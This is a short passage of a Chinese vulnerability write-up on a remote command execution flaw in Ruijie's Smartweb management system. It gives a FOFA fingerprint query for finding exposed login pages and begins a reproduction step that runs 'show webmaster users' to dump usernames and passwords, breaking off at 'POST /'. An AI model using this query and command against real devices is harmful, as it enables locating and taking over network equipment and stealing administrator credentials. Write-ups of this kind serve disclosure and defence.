锐捷 Smartweb管理系统
0x01 漏洞描述0x02 漏洞指纹0x03 漏洞复现0x01 漏洞描述
锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷Smartweb系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
0x02 漏洞指纹
FOFA
title="无线smartWeb--登录页面"
0x03 漏洞复现
1、执行查看用户名和密码POC,show webmaster users得到回显
POST /
